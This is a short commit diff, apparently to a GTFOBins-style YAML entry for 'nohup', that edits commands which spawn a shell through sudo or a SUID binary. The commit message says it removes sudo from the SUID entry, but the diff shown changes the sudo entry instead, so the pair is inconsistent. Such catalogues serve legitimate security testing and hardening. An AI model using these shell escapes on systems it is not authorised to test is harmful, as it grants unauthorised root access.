Remove redundant sudo from SUID category

This commit is contained in:
Shikata 2021-01-11 12:31:54 +02:00
parent bb4050810e
commit db40142ea7

View File

@ -8,7 +8,7 @@ functions:
nohup "$COMMAND" nohup "$COMMAND"
cat nohup.out cat nohup.out
sudo: sudo:
- code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)" - code: nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
suid: suid:
- code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)" - code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
--- ---